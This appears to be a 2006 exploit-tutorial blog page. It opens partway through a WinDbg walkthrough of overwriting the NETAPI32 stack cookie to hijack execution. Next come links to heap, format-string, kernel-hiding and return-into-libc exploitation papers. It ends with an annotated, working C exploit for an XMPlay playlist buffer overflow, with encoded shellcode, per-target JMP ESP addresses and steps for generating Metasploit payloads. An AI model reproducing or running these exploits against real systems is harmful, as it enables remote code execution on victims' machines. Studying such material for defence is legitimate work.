After debug several times I found that this address is a fixed address inside NETAPI32 dll. Wow !!! my theory will become true if this address is writable. I haven’t tested but I quite sure that this memory location is writable because the cookie is generated at runtime and the process must have the write permission on it. If the process there is no write permissions, the valid cookie cannot be saved.
Now before we continue, I’ve rewrite the $path to make it more readable:
…

$shellcode = “\xcc” x length($shellcode)
my $path = $shellcode.
(“\x41” x ($target->[1] – length($shellcode))).
(“\x49” x 52).
(“\xec\xc1\xc8”\x71”).
(“\x43” x 40).
(“\x00\x00”);
…
and then rerun the exploit:
kd> bp 77bd4d33 "j @ecx = 71c8c1ec '';'gc'"
kd> g
001b:77bd4d33 668901 mov word ptr [ecx],ax
kd> r
eax=00e84242 ebx=77bd4cfe ecx=71c8c1ec edx=00e8f4f8 esi=00000000 edi=77bd4e32
eip=77bd4d33 esp=00e8f4e0 ebp=00e8f910 iopl=0 nv up ei ng nz na po cy
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000283
001b:77bd4d33 668901 mov word ptr [ecx],ax ds:0023:71c8c1ec=e64e
kd> p
001b:77bd4d36 41 inc ecx
kd> dd 71c8c1ec
71c8c1ec bb404242 00000000 00000000 00000000
71c8c1fc 00000000 000926e0 ffffffff 00000000
71c8c20c 00000000 00000000 00000000 71c8c218
71c8c21c 71c8c218 00000000 00000000 00000000
71c8c22c 00000000 00000000 00000000 00000000
71c8c23c 00000007 00000001 00000000 00000000
71c8c24c 00000000 00000000 00000000 00000000
71c8c25c 00000000 00092780 ffffffff 00000000

there is no error occur and the first 2 bytes of 0x71c8c1ec is overwrite to 0x4242 value. I let windbg run until it write all of the shellcode into 0x71c8c1ec – to see whether or not it allow to overwite memory location outside 0x71c8c1ec. I view the memory location:

kd> dd 71c8c1ec
71c8c1ec 42424242 42424242 42424242 42424242
71c8c1fc 42424242 42424242 42424242 42424242
71c8c20c 42424242 42424242 42424242 42424242
71c8c21c 42424242 42424242 42424242 42424242
71c8c22c 42424242 42424242 42424242 42424242
71c8c23c 42424242 42424242 42424242 42424242
71c8c24c 42424242 42424242 42424242 42424242
71c8c25c 42424242 42424242 42424242 42424242

Yeah !!! we can write our shellcode into the address 0x71c8c1ec - we can control the valid cookie. I let windbg run until it reach at the instruction address 0x71c44b8 – call the security cookie checking function().

kd> r
eax=00000000 ebx=000e9a70 ecx=49494949 edx=00e0f94e esi=000e7bc0 edi=00000000
eip=71c44b88 esp=00e0f4f8 ebp=00e0f910 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246
001b:71c44b88 e869c9ffff call 71c414f6
Our ecx value is 0x49494949 before compare with the value at the address 0x71c8c1ec. It’s a simple work to find the offset of this – it’s the 66th bytes from that last of $path variable. I change these bytes to “\x42” and then run the exploit again:

kd> r
eax=00000000 ebx=00106bc0 ecx=42424242 edx=00e8f94e esi=000e3670 edi=00000000
eip=71c44b88 esp=00e8f4f8 ebp=00e8f910 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246
NETAPI32!CanonicalizePathName+0x136:
001b:71c44b88 e869c9ffff call NETAPI32!__security_check_cookie (71c414f6)
kd> dd 71c8c1ec
71c8c1ec 42424242 42424242 42424242 42424242
71c8c1fc 42424242 42424242 42424242 42424242
71c8c20c 42424242 42424242 42424242 42424242
71c8c21c 42424242 42424242 42424242 42424242
71c8c22c 42424242 42424242 42424242 42424242
71c8c23c 42424242 42424242 42424242 42424242
71c8c24c 42424242 42424242 42424242 42424242
71c8c25c 42424242 42424242 42424242 42424242
kd> p
NETAPI32!CanonicalizePathName+0x13b:
001b:71c44b8d c9 leave
kd> p
NETAPI32!CanonicalizePathName+0x13c:
001b:71c44b8e c21400 ret 14h
kd> p
001b:49494949 ?? ???
At this time ecx value is matched, the “leave” and “ret” instruction are executed. This results in the flow of execution transfer 0x49494949 – I win ^0^. Finding the offset of 0x49494949 is not the hard part. I change 0x49494949 to 0x71c8c1ec – address of our shellcode – End Game…

Bypssing Windows Heap Protections

hessamx — Thu, 14 Dec 2006 13:20:53 +0000

milw0rm papers is a good archive for nice papers. (thx to str0ke for made this archive).
recently posted a paper about Bypassing Windows Heap Protections by falliere .
;) read this paper : milw0rm.com

Advances in format string exploitation

hessamx — Sat, 09 Dec 2006 15:47:44 +0000

This paper explains about Exploting Heap Based format strings & about Brute Froce attacks in this method .
Phrack 0x0b, Issue 0x3b, Phile #0x07 of 0x12
(Read More ...)
Source : Phrack.org

Smashing The Kernel For Fun And Profit

hessamx — Sat, 09 Dec 2006 15:40:59 +0000

This is a translation of the original article published on www.s0ftpj.org .
( introduction section ...)
Today the net offers us a lot of pseudo-tools that work as processes hiders but, as well known, they are far to be perfect. Let's start for example with a classic binary-trojan: running strace we'll notice immediately that there's something that needs our attention.
(read more ...)

At the end, in more or less twenty seconds (in the evenience the sysadmin is quite unwise) we would find ourselves out of our preferred system. We can reach fourty seconds if we are planning to use kernel-tools,like the famous knark and adore, but, on my opinion, that is too less time to work in peace :-) In the article that follows I'll show you a technique that allows you to remain into a system for enough time or to give a sysadmin a
terrible headache.
Source : Milw0rm.com

BOF exploit in the Alpha Linux

hessamx — Thu, 07 Dec 2006 15:12:56 +0000

There are many exploit code of buffer overflow. However, almost all codes works well only in the intel x86 linux. This paper will attempt to explain how you exploit same bug in the alpha linux. Read this paper in securiteam.com

Advanced malloc exploits

hessamx — Thu, 07 Dec 2006 15:05:12 +0000

This article explains what several techniques that allow more generic and reliable exploitation of processes that provide us with the ability to overwrite an almost arbitrary 4 byte value at any location.
read this paper in Phrack.org

Exploiting with linux-gate.so.1

hessamx — Thu, 07 Dec 2006 13:32:28 +0000

linux-gate.so.1 not a dynamically loaded library but a dynamically shared object (DSO).This article explains what linux-gate.so.1 how it can be useful for exploits and can byppasing some protections.this is pretty good for Buffer Overflow Exploits.
you can read this paper here.

return-into-libc Papers

hessamx — Thu, 07 Dec 2006 13:24:05 +0000

return-into-libc is very useful method for exploiting .this is a method of exploiting a buffer overflow on a system that has a non-executable stack (like linux).

The advanced return-into-lib(c) exploits
Exploitation - returning into libc
c0ntex - return to libc

Advanced malloc exploits

hessamx — Wed, 06 Dec 2006 11:47:05 +0000

This paper details several techniques that allow more generic and reliable exploitation of processes that provide us with the ability to overwrite an almost arbitrary 4 byte value at any location.
(read more ...)

Higher level techniques will be constructed on top of the unlink() basic technique (presented in MaXX's article [2]) to exploit processes which allow an attacker to corrupt Doug Lea's malloc (Linux default's dynamic memory allocator).
Source : phrack.org

analyze XMPlay 3.3.0.4 BOF Exploit

hessamx — Sat, 02 Dec 2006 10:37:44 +0000

Source : milw0rm's Froum

Thisone uses a file to exploit a vulnerability, so when your victim opens this
file..the vulnerability gets exploited and calc.exe is executed on the victims system.

Vulnerability Description:

Greg Linares has discovered a vulnerability in XMPlay,
which can be exploited by malicious people to compromise
a user's system.

The vulnerability is caused due to a boundary error within the
parsing of playlists (.m3u, .pls, and .asx) containing an overly
long file name (greater than 500 bytes). This can be exploited
to cause a stack-based buffer overflow via a specially crafted playlist file.

Successful exploitation allows execution of arbitrary code.
The vulnerability is confirmed in version 3.3.0.5.
Other versions may also be affected.

Let's analyze the exploit ...
(read more ... )

URL: http://www.milw0rm.com/exploits/2821
Author: Greg Linares

Payload:

---
PLS Format
[playlist]
File1=C:\[BUFFER][JMP][SHELLCODE][NOPSLED][Extension]
Title1=title (could also be used for the buffer overflow exploit)
---

Perfectly explained by the author of the exploit.

---
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char *argv[])
{

FILE *Exploit; <<<<<<<<<<--- the file handle
char buffer[512];
char *outp;

/* Executes Calc.exe Alpha2 Shellcode Provided by Expanders <expanders[at]gmail[dot]com> */
unsigned char scode[] =
"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"
"YlHhQTs0s0c0LKcuwLLK1ls52Xs1JONkRofxNkcoUpUQZKCylK4tLKuQxnTqo0LYnLMTkpptUWiQ9ZdM"
"5QO2JKZT5k2tUtUTPuKULKQOfDc1zKPfNkflrkNkSowlvaZKLK5LlKgqxkMYqL14wtYSFQkpcTNkQPtp"
"LEiPd8VlNkqPVllKPp7lNMLK0htHjKuYnkMPnP7pc05PLKsXUlsovQxvU0PVOy9hlCo0SKRpsXhoxNip"
"sPu8LX9nMZvnv79oM7sSU1rLsSdnu5rX3UuPA";

---
Q: How do I generate Alpha2 shellcode?
A:

Generating alphanumeric shellcode with metasploit,

Example:

http://metasploit.com:55555/PAYLOADS?parent=GLOB%280x2b3a0bed83d0%29&MODULE=win32_exec&MODE=GENERATE&OPT_CMD=calc.exe&OPT_EXITFUNC=seh&MaxSize=&BadChars=0x00+&ENCODER=Msf%3A%3AEncoder%3A%3AAlpha2&ACTION=Generate+Payload

That should show you something like:

/* win32_exec - EXITFUNC=seh CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com */
unsigned char scode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x48\x49\x49\x49\x49\x49\x51\x5a\x6a\x46"
"\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x56\x32\x41\x42\x41\x32"

etc etc....

Q: So how do convert it into the same form as the above one?
A: Strip everything down, replace the \ chars with % and remove the " chars and the x chars by just replacing them with nothing
untill you get something like this:

%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49%49%49%49%49%49%48%49%49%49
%49%49%49%51%5a%6a%48%58%50%30%42%30%42%6b%42%41%58%32%42%42%42%41%32%41%41
%30%41%41%58%38%42%42%50%75%4b%59%4b%4c%4b%58%71%54%33%30%47%70%75%50%4c%4b

etc etc..

Then use the hex to ascii converter to convert it to the ascii form:

http://centricle.com/tools/ascii-hex/

It should output something like this:

?Y??????IIIIIIIIIIIHIIIIIIQZjHXP0B0BkBAX2BBBA2AA0AAX8BBPuKYKLKXqT30GpuPLK0EElNkCLs5d8u
QholKbo6xnkQO10eQZK0InkFTNkWqXnFQiPJ9NLlDo0cDs7kqxJTMC1zbzKl4EkrtwTDDsEkUNkQOfDeQjKQvnk
vl0KNk1OuLS1xkLKULlKc1ZKMYALUtfdO3Eakp0dnk70dpMUyPD8tLnk704LnkrPULNMLKAxC8JK7yLKmPnPS0
S0WpLK587LSo01yfcP0VK9yhlCKpcK0PPhZPnjGtAO1xohYnNjFnf79oZG2CAqRLbCDnU5bXqus0H

congratulations...

---
char NOPSled[50]; <<<--- buffer used for the nopsled
char tail[] = ".mid\r\n"; <<-- used to supply the extension
int JMP, x; <<-- to store his jmp esp address

Usage information:

printf("\n======================================================================\n");
printf("XMPlay 3.3.0.4 and prior PLS Filename Buffer Overflow Exploit\n");
printf("Discovered and Coded By: Greg Linares <GLinares.code[at]gmail[dot]com>\n");
printf("Usage: %s <output PLS file> <JMP> [Exploit Display Name] \n", argv[0]);
printf("\n JMP Options\n");

List of targets which the exploit supports:

printf("1 = English Windows XP SP 2 User32.dll <JMP ESP 0x77db41bc>\n");
printf("2 = English Windows XP SP 1 User32.dll <JMP ESP 0x77d718fc>\n");
printf("3 = English Windows 2003 SP0 and SP1 User32.dll <JMP ESP 0x77d74adc>\n");
printf("4 = English Windows 2000 SP 4 User32.dll <JMP ESP 0x77e3c256>\n");
printf("====================================================================\n\n\n");
---
Q: Why does he use JMP ESP???
A: It's an exploitation method to bypass restrictions which are set by the operating system and ofcourse to execute your shellcode
There is a nice paper on a couple of exploitation methods for linux and windows by David Litchfield:

http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf

or you could take a look at this,

http://www.google.nl/search?hl=nl&q=jmp+esp+exploitation&btnG=Zoeken&meta=

Make sure you supply enough arguments (Usage: %s <output PLS file> <JMP> [Exploit Display Name] \n", argv[0]);)

if (argc < 2) {
printf("Invalid Number Of Arguments\n");
return 1;
}

This part generates a new file for writing, the filename is supplied by you (argv[1])

----
Exploit = fopen(argv[1],"w");
----

Print an error if the exploit fails to "open" a new file.

----
if ( !Exploit )
{
printf("\nCouldn't Open File!");
return 1;
}
----

----
memset(buffer, 0, 505);
memset(NOPSled, 0, 20);
----

NAME
memset - fill memory with a constant byte

SYNOPSIS
#include <string.h>
void *memset(void *s, int c, size_t n);

DESCRIPTION
The memset() function fills the first n bytes of the memory area pointed
to by s with the constant byte c.

----

Remember:

PLS Format
[playlist]
File1=C:\[BUFFER][JMP][SHELLCODE][NOPSLED][Extension]
Title1=title (could also be used for the buffer overflow exploit)

----
fputs("[playlist]\r\n", Exploit); <- Puts [playlist] into the file
fputs("File1=", Exploit); <- puts File1= into the file
fputs("C:\\", Exploit); <- puts C:\ into the file

----

Fill the buffer with A's (U gotta luv the A)

----
for (x=0;x<505;x++) {
strcat(buffer, "A");
}
----

fputs(buffer, Exploit); <- put the buffer into the file.
----

This part defines your target so if you chose 1 for example..it would use \xbc\x41\xdb\x77 as jmp esp address.

----
if (atoi(argv[2]) <= 0) {
JMP = 1;
} else if (atoi(argv[2]) > 4) {
JMP = 1;
} else {
JMP = atoi(argv[2]);
}
switch(JMP) {
case 1:
printf("Using English Windows XP SP2 JMP...\n");
fputs("\xbc\x41\xdb\x77", Exploit);
break;
case 2:
printf("Using English Windows XP SP1 JMP...\n");
fputs("\xfc\x18\xd7\x77", Exploit);
break;
case 3:
printf("Using English Windows 2003 SP0 & SP1 JMP...\n");
fputs("\xdc\x4a\xd7\x77", Exploit);
break;
case 4:
printf("Using English Windows 2000 SP 4 JMP...\n");
fputs("\x56\xc2\xe3\x77", Exploit);
break;
}

-----

fputs(scode, Exploit); <- put the shellcode into the file.

----
for (x=0;x<20;x++) {
strcat(NOPSled, "\x90"); <- fill the nopsled with 0x90's
}
----

----
fputs(NOPSled, Exploit); <- put the nopsled into the file
fputs(tail, Exploit);
if (strlen(argv[4]) > 0) {
fputs("Title1=", Exploit); <- puts your "title" into the file , if you supplied one..
fputs(argv[4], Exploit);
fputs("\r\n", Exploit);
} else { <- if you didn't supply a "title" it supplies one for you...
fputs("Title1=XMPlay_0-Day_PLS_Buffer_Overflow_Exploit_By_Greg_Linares\r\n", Exploit);
}

fputs("Length1=512", Exploit); <- puts Length1=512 into the file

printf("Exploit Succeeded...\n Output File: %s\n\n", argv[1]); <- done with the file...

printf("Exploit Coded by Greg Linares (GLinares.code[at]gmail[dot]com)\n"); <- even more comments by the author.
printf("Greetz to: Jerome Athias and Expanders - Thanks For The Ideas, Tools and Alpha2 Shell Code\n");

fclose(Exploit); <- close the file handle.
return 0;
}

Source : milw0rm , Preddy